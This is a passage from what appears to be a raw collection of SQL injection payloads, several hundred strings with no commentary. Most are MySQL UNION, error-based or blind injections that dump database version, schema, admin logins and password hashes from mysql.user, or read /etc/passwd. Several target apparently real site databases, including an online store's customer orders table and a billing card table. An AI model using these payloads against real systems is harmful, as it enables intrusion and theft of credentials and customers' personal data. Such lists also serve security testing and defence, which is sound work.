information_schema.columns where table_name=0x7573657273 /* -66 union select 1,2,3,table_name,5,6,7,8,9,10 from information_schema.tables limit 25,100/* 66 union select 1,2,concat(user(),0x3a,database()),4,5,6,7,8-- -66' union select 1,2,concat_ws(0x3a,table_schema,column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name='userlist' limit 1,1-- -66 UNION SELECT 1,2,concat_ws(0x3a,user,password,file_priv) ,4,5,6,7,8 from mysql.user-- -66 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* -66 union select 1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9,10,11,12 from b_admin -66 union select 1,concat_ws(0x3a,version(),user()),3,4,5,6,7 from mysql.user-- -66 union select 1,version(),3,concat_ws(user(),char(58),database()),5,6,7,8,9,10,11,12/* 66 union select concat_ws(0x3a,0x73616e656b736f736f,user(),database(),version())-- -6716 union select 1 from admin/* 671-999.9 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -671 union select 1,concat_ws(0x3a,admin_id,admin_name,admin_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from admin-- -6729 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65-- -673' union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12-- 675 UNION SELECT 0,1,2,3,4,concat_ws(0x0b,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18 -67662 union select 1,concat_ws(0x3a,version(),user(),database()),3-- -67753 union select 1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from customers-- 67764 union select 1,2,concat_ws(char(32,32),version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -677 union select 1,2,3,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),5,6,7,8,9 -- 6796 and ascii(substring((SELECT table_name FROM information_schema.columns WHERE column_name like char(37,108,111,103,105,110,37) limit 2,1),1,1))=117u 679877987377987 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10-- 67-999.9 union select 1,2,version() -- 679 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,concat_ws(0x3a,user(),database(),version()),29,30,31,32,33,34,35-- 67 and 1=2 union all select 1,2,concat(0x3a,version(),user(),database()),4 67/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(user_login,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from ingelec_mailing.site_users-- -67 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* -67' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,database(),24,25,26,27 /* -67 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user(),database(),version()),14,15-- -67' union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database()),14,15,16,17-- -67 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15,16,17,18,19,20-- -67 union select 1,2,3,4,5,6,table_name,null from information_schema.tables limit 1,200/* -67' union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9/* -67 union select 1,2,3,4,concat_ws(0x26,user(),database(),version(),LOAD_FILE('/etc/passwd')),6,7,8,9,10,11,12,13,14-- -67 union select 1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -67' union select 1,2,3,user(),5 -- -67 union select 1,2,cast(concat(table_name,0x3a,column_name) as binary),4,5 from information_schema.columns where column_name like 0x257061737325-- -67 union select 1,2,concat(0x2a,user(),0x2a,database(),0x2a,version()),4,5,6,7,8,9,10,11,12,13,14,15 -67 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8-- -67 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5 -- -67 union select 1,2,password,4,5,6,7,8,9,10,11,12,13 from users -67) union select 1,2,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- -67 union select 1,concat(alpha,0x3a,name,0x3a,email,0x3a,pos,0x3a,dep,0x3a,type),3,4 from staff/* -67 UNION SELECT 1,concat(user(),0x3a,version()),3,4,5/* 67 union select 1,concat(user(),0x3a,version()),3,4,5,6 67 union select 1,concat(user(),char(58),version()),3,4,5,6,7/* -67' union select 1,concat_Ws(0x3a3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin limit 0,1 -- -67 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 -67 UNION SELECT 1,group_concat(id,0x3b,username,0x3b,password),3,4,5,6,7,8,9,10,11 from user-- -67 union(select concat_ws(0x3a,username,password),2,3,4,5 from cms_users limit 1,1) -- -67 union select concat_ws(0x3a,version(),database(),user()),2 -- 6805 and 1=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x3167625f6265737461717561-- -68076 union select 1,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),3,4,5,6/* -680 union select 1,2,3,4,5,6,id,8,9,10,11,12,13,14,15,concat(login,CHAR(58),parol),17,18 from prepods where id=18/* -680 union select 1,2,user(),4/* -680' union select 1,concat_ws(0x3a3a3a,table_name,table_schema),3,4,5,6,7,8,9 from information_schema.tables-- -682 union select 1,2,3,4,version()-- -682 union select 1,concat(user(),char(59),database(),char(59),version()),3/* 683' union select concat_ws(0x3a,version(),user(),database()),2,3,4,5-- -684/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from mysql.user/* -684 union select concat_ws(char(58),cast(table_name as binary)) from information_schema.tables limit 274,1 -- 685 UNION SELECT 1,database(),3,4,password,6,7,user(),9,10,name,12,13,14,15,16,id,18,19,20,21,22,@@version_compile_os,24,25,26,27,28,29,version(),31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 FROM users LIMIT 1,1-- -6869 union select 1,2,concat(login,char(58),password),4,5,6,7 from users limit 1,1/* -686 union select 1,2,3,4,5,6,7,8,concat_ws(0x2a,database(),version(),user(),@@version_compile_os) -686 UNION SELECT 1,2,3,4,name,pass,7,8,9 from users limit 3,1/* 68764322774 union select 1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),5,6,7-- 68764687687 uNiOn select 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),3,4-- 68768758595431 union select concat_ws(0x3a,version(),user(),database())-- 687696704 union select 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),4,5,6,7,8,9,10,11-- 6878761079 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat_ws(0x3a,version(),user(),database()),31,32,33,34,35,36,37,38,39-- -6878 union select 1,2,3,4,5,concat_ws(0x3a ,user(),database(),version()),7,8,9,10,11,12,13-- 688 and (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2))) -688 union select 1,2,concat_ws(0x3a ,user(),database(),version()),4,5,6,7,8,9/* 688' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from sys.dual-- 689765891 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11-- 68-999.9 union select 1,2,3,4,5,6,7,concat_ws(user(),version(),database()),9,10,11,12-- 68-999.9 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 68-999.9 union select 1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6,7,8,9-- -6899' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,USER(),19,20,21,DATABASE(),VERSION(),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155/* -689 union select 1,unhex(hex(concat_ws(0x3a,user(),database(),version()))),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46-- 68 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))-- -68 union select 1,2,3,4,5,6,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),8,9 -- -68 union select 1,2,3,4,5,password,7,8,9,10,11,12 from usuarios-- -68 union select 1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -68 union select 1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,database(),22,23,24,25,26,27,28,version(),30,31,32,33,34,35,36,37,38,39/* -68' union select 1,2,3,concat_ws(0x3a3a,id,username,pwd),5,6,7,8,9 from users limit 2,1 /* -68 union select 1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),5 -68 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16/* -68 union select 1,2,3,group_concat(0x0b,table_name) from information_schema.tables -- -68 UNION SELECT 1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -68 union select 1,2,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),group_concat(0x0b,user,0x3a3a,password),5,6,7,8,9,0,1 from mysql.user-- -68 union select 1,2,concat_ws(0x3a,VERSION(),user()),4,6,6,7,8,9-- -68' union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- -68 union select 1,2,user(),4,version(),6,7,8/* -68 union select 1,group_concat(table_name separator 0x7c) from information_schema.tables where table_schema=0x6a6b74656173686f5f746561-- -690' union select 1,2,3,concat(username,0x3a,password),5,6,7,8 from forums_auth/* -6913/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(name,0x3a,password),18 from admin limit 2,1/* -69144 union select 1,2,table_name,4,concat_ws(char(58),version(),user(),database()),6,7 from information_schema.tables limit 16,8 -- -6919 union select 1,2,3,4,5,group_concat(table_name separator 0x0b),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.tables where table_schema=0x762d313633375f6c6f636d616e5f677a-- -691 union select 1,2,3,database(),5,6,user(),8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 692' or 1 group by concat(concat_ws(0x3a,database(),user(),version()),floor(rand(0)*2))having min(0) or 1 -- -692 union select 1,2,3,4,version()-- -692 union select 1,group_concat(0x3C494E4A5F494E464F3E,user(),0x3a,database(),0x3a,version(),0x3C494E4A5F494E464F3E),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- -69339 union select 1,2,concat(user,char(58),password),4,5 from mysql.user limit 1/* -693 union select 1,2,concat_ws(0x3a3a,name,uname,email,pass),4,5,6,7,8,9,10,11,12 from nuke_users limit 1,1 /* -694 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48/* -69584 union select 1,concat_ws(0x3a3a3a,user,password,file_priv),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from mysql.user -- 69607 or 1=(select top 1 table_name from information_schema.tables where table_name not IN ('WhatTypeID2WhatTypeID','aa_StoryWhatScrapbookDups','v_BlowoutBands','What','DPWI_BannerPageSectionPosition','aa_StoryWhoScrapbookDups','v_ClubListingDistinct','DPWI_GetAdInfoPositions','aa_StoryWorksScrapbookDups','v_ClubReviews','vStoryBody','aa_PlaceWhatScrapbookDups','v_DiningGuide','StoryTemp','aa_PlaceWhoScrapbookDups','v_EventSummarybyType1','aa_PlaceWorksScrapbookDups','v_mtRadioPlaylist','v_PDI_LocationWithArea','aa_StoryPlaceScrapbookDups','AAA_DEBUG_WhyWHListingFails','Announcements','Areas','BestOfAwards','BestOfBallotDetail','BestOfBallots','BestOfBallots2','blogPosts','Blogs','Blogs_Authors','blogUsers','Cities','ClassAd_Advertisements','ClassAd_Classifications','ClassAd_MainCategories','ClassAd_MainCategories_Classifications','ClubListing','Comments','Contacts','DP_ROLE','DP_USER','DP_UserDetails_VIEW','DPWI_AdCriteria','DPWI_ADInfo','DPWI_ADPage','DPWI_ADPageSection','DPWI_AdPosition','DPWI_AdSchedule','DPWI_PlaceDetails')) -6988 union select table_name from information_schema.columns where column_name like 'password' 69897179879832 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),3,4,5,6,7,8,9,10,11-- 6999999 union select 1,2,3,4,5,6,concat(user,char(58),password) from mysql-old.user-- 6999999 union select 1,2,3,4,5,6,concat(user,char(58),password) from mysql.user-- 69-999.9 union select 1,2,3,4,5-- 6-999.9 union select 1,version(),3,4,5 -- 699 union select unhex(hex(versio())),2,3,4,5 limit 1,1/* -69 and 1=2 union all select 1,2,3,4,5,6,7,8,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- # not sql #-69 union select1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/* -69 union select 1,2,3,4,5,6,7,email,9,10 from users limit 5/* 69 union select 1,2,3,4,5,concat(user,0x3a,password,0x3a,host),7,8 from mysql.user/* -69 union select 1,2,3,4,concat_ws(0x3b,version(),user(),database()) 69 UNION SELECT 1,2,3,concat(email,char(58),password),5,6,7,8 FROM user/* -69 union select 1,2,3,concat(version(),char(58,58),database(),char(58,58),user()),5,6,7,8/* -69 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5 -- -69 union select 1,2,concat(uname,0x3a,pass),4 from users/* -69 union select 1,2,concat(uname,char(58),pass),4 from users/* -69 union select 1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60 from _tusers limit 0,1-- 69 union select 1,2,user(),version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* -69' union select 1,2,version(),4,5 -- 69 UNION SELECT 1,concat(login,0x3a,password),3,4,5,6,7,8 FROM users LIMIT 1,1/* -69 UNION SELECT 1,CONCAT(ordID,0x3a,ordSessionID,0x3a,ordName,0x3a,ordAddress,0x3a,ordCity,0x3a,ordState,0x3a,ordZip,0x3a,ordCountry,0x3a,ordEmail,0x3a,ordPhone,0x3a,ordShipName,0x3a,ordShipAddress,0x3a,ordShipCity,0x3a,ordShipState,0x3a,ordShipZip,0x3a,ordShipCountry,0x3a,ordAuthNumber,ordAuthNumber,0x3a,ordAffiliate,0x3a,ordPayProvider,0x3a,ordShipping,0x3a,ordStateTax,0x3a,ordCountryTax,0x3a,ordHSTTax,0x3a,ordHandling,0x3a,ordShipType,0x3a,ordTotal,0x3a,ordDate,0x3a,ordIP,0x3a,ordDiscount,0x3a,ordDiscountText,0x3a,ordExtra1,0x3a,ordExtra2,0x3a,ordAddInfo,0x3a,ordComLoc,0x3a,ordStatus,0x3a,ordStatusDate,0x3a,ordStatusInfo,0x3a,ordAddress2,0x3a,ordShipAddress2,0x3a,ordExtra3,0x3a,ordTrackNum,0x3a,ordAVS,0x3a,ordCVV,0x3a,ordInvoice,0x3a,ordShipCarrier),3,4 FROM spect9_spectrumaudio.orders limit 0,1-- -69 union select 1,concat_ws(0x3A3a,database(),version()),3,4-- -69 union select 1,password,3,4,5,6,7,8,9,10 from user -69 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -6 and 0 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os) -- #6 AND 1 6 and 1=0 UnIon selECt 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database() -- 6 and 1=0 union select 1,2,3,4,5,group_concat(schema_name),7,8,9 from information_schema.schemata-- 6 and 1=0 union select 1,2,3,4,5,group_concat(table_name),7,8,9,10 from information_schema.tables -- 6 aNd 1=0 UNION SELECT 1,2,3,4,5,version(),7 -- 6 and 1=0 union select 1,2,3,4,aes_decrypt(aes_encrypt(group_concat(username,char(58),password),1),1),6 from websiteadmin_admin_users 6 and 1=0 UNION SELECT 1,2,3,4,version(),6,7 -- 6 and 1=0 union select 1,2,3,c0ncat_ws(0x3a,version(),user(),database()),5,6-- 6 and 1=0 union select 1,2,3,version(),table_schema,6,table_name,8 from information_schema.tables limit 109,1/* 6' AND 1=0 union select 1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13/* 6 and 1=0 union select 1,2,version()-- 6' aNd 1=0 UNION SELECT 1,2,version() -- 6 and 1=0 union select 1,group_concat(column_name separator 0x0a),3,4 from information_schema.columns where table_name=0x776F726B5F636174 -- 6 and 1=0 UnIon selECt 1,UNHEX(HEX(concat_ws(login,0x3a,pass))),3,4 from admin -- 6 and 1=0 union select group_concat(schema_name) from information_schema.schemata-- 6 and 1=0 Union Select null,null,null,null,concat(0x494E43,@@version,0x3a,user(),0x3a,database(),0x3a,@@version_compile_os)-- 6 and 1=0 Union Select UNHEX(HEX(version())) ,2,3,4,5,6,7,8,9 6 AND 1=2 UNION SELECT 0,concat(name,0x3a,password),2,3,4,5,6,7,8,9,10,11 from administrator-- 6 AND 1=2 UNION SELECT 0x31,0x4861636B656420627920494E432E-- 6 AND 1=2 UNION SELECT 1,2,3,4,5,6,version(),8-- 6 and 1=2 union select 1,2,concat_ws(0x3a,version(),user(),database()),4-- 6 and 1=2 union select 1,2,table_name,4,5,6,7 from information_schema.tables limit 22,1/* 6 and(1=2) union select 1,concat(login,0x3a,password,0x3a,email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 from user/* 6 and 1=2 union select version(),2,3,4 -- 6 AND 1=ascii(mid(version(),1,1)) -70' or(1,1)=(select count(0),concat((select concat(username,char(58),password) from user limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- -70 union select 1/* 70 union select 1*/ -70' union select 1,2,3,4,5,6,7,8,9,10,11,12 -- -70' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,version(),23,24,25,26,27-- -70 union select 1,2,3,4,5,6,7,8,concat(user,0x3a,password,0x3a,host),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 from mysql.user/* 70 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8 -- -70 union select 1,2,3,concat(username,0x3a3a,password),5,6,7,8,9,10 from users /* -70 UNION SELECT 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from admin-- 70 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5-- -70 union select 1,2,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),4,5/* -70 union select 1,2,concat(id,0x3a,username,0x3a,passwd),4,5,6,7,8,9,10,11,12 from users/* -70 union select 1,2,concat(login,0x3a,password,0x3a,email),4,5 from users limit 1/* -70 union select 1,concat(user(),0x2a,database(),0x2a,version()),3,4,5,6,7,8,9,10 -70 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10-- -70 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/* -70 union select 1,version()/* -70 ' UNION SELECT concat_ws(0x1a,version(),user(),database()),2,3 -- -70 union select concat_ws(0x3a,CardID,SerialNo,CardUserName,CardPasswd,SeriesID,Active,AccNo,LocationID,SellingDate,SellingAdmin,SellingIP,Discount,FreeBonus,Amount,Entered,SaleRecID) from ispbilling.TblPasswdCards limit 1,1-- -70 union select login from access_admins limit 0,1-- -70 union select username,password from user limit 1,1 -- -7100 union select 1,2,3,4,5,concat(user,0x3a,password),7,8 from mysql.user/* -711 union select 1,2,3,4,version(),6,7,8,9,10-- -712 UnIon selECt 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 -- 71327' and 1=2 union select 1,2,3,4,5,6,7,concat_ws(0x3b,user_name,user_password),9,10,11,12,13,14,15,16,17,18,19,20,21 from ClinchFestStore.wp_users limit 0,1 -- -7146 UNION SELECT 1,username,3,4,5,6,7,8,9,10,11,12,13,14,15 from user/* -714 UNION SELECT concat_ws(0x3a,user(),version(),database()),2,3,4,5,6-- 715 and 1=0 UnIon selECt 1,2,group_concat(schema_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 from information_schema.schemata -- -715 union select concat_ws(0x3a,version(),user()),2-- 71709380982 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 71731 and to_char(11)=to_char(1)||to_char(1) -- -7175 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),9,10,11,12,13,14,15,16,17,18,19 -717 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -717 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()) -717 union select 1,group_concat(table_name separator 0x3a),3,4,5 from information_schema.tables where table_schema=0x736b756e735f6d61696e-- -7183 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9-- -7185 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 from admin-- -71891 union select 1,2,3,4,concat(char(58),char(58),char(58),char(58),char(58),name,char(58),passwd),6,7,8,9,10,11,12 from user limit 1,1/* -718 UNION SELECT 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 -71989 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3/* 71 and 1=0 union select version(),2,3,4,5,6,7,8,9,10 -- -71 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 -- -71 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,0,11,12,13,14,15,16,17,18,19,2020 -- -71 union select 1,2,3,4,5,unhex(hex(concat_ws(0x3a,version(),database(),user()))),7,8,9-- -71 union select 1,2,3,concat_Ws(0x3a3a,account_username,account_password),5 from ttt1_accounts -- -71 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13 -- -71 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13-- -71 union select 1,2,concat_ws(char(58,58),user(),database(),version()),4,5,6,7,8,9,10,11,12/* -71 union select 1,concat(user,0x3a,password,0x3a,host),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from mysql.user limit 22,1/* -71 union select 1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME) SEPARATOR 0x3C62723E),3,4,5,6,7,8,9,10,11 from information_schema.columns where column_name like 0x257061737325 or column_name like 0x25702577256425-- -71 union select 1,username,hash,4,5,6,7,8,9,10,11,12 from users-- -71' union select user(),2/* -7208 union select 1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()) -- -720 union select 1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10,11,12,13,14/* -721023 union select unhex(hex(concat_ws(0x3a,user_id,username,userpass))),2,3,4,5,6 from poll_user-- 722222 union select 1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10-- -72298 union select 1,2,3,4,5,6,7,concat(version(),0x3a,database(),0x3a,user()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -722 union select 1,2,3,concat_ws(0x3a,username,password,LoginString),5,6,7,8,9,10,11,12,13,14,15,16,17 FROM admins-- -722 union select 1,database(),3,concat(version(),0x3a,user()),5,6,7,8,9,10,11,12/* 723537372' and 1=0 UNION SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -723 union select 1,2,3,4,5,6,7,8,concat(user(),char(58),database(),char(58),version()),10,11,12,13,14,15,16,17,18,19,20/* -723 union select 1,2,3,load_file('etc/passwd'),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* -723 union select concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from INFORMATION_SCHEMA.COLUMNS limit 1 offset 310/* 72419' union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15 limit 1,1/* 724 and ascii(lower(substring(user(),1,1)))=109 7253 AND 1=0 UNION SELECT ALL 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from users-- -725 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13-- -725' union select 1,concat_ws(0x3a,user(),0x3a,database(),0x3a,version(),0x3a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# -7269 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15/* -726 union select 1,table_name,table_schema,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19 from information_schema.tables limit 23,1-- -7271 union select 1,2,version(),4,5,6,7 from showbiz/* 72738098097 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7-- 7275 and(1=1)-- -727 union select 1,2,3,4,concat_ws(char(58),user(),version() ,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -7287 union select 1,2,concat_ws(0x3b,user(),database(),version()),4,5,6,7/* -728' union select 1,2,3,4,5,6,7,8,9,version() -- 72-999.9 union select 1,version(),3,4,5,6,7,8,9,10 -- -72 and 0 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8 -- 72 AND ASCII(SUBSTRING((select version()),1,1))=x/* 72 UNION SELECT 0,1,2,3,4,5,concat(table_name,0x0b,column_name),7,8,9,10,11,12,0x73716C696E6A666C643137,0x73716C696E6A666C643137,0x73716C696E6A666C643137,0x73716C696E6A666C643137 FROM INFORMATION_SCHEMA.COLUMNS-- -72 union select 1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12-- -72 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9 -72 union select 1,2,3,4,group_concat(password,0x3a,email),6,7,8,9,0,11,12 from accounts 72 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13/* 72 union select 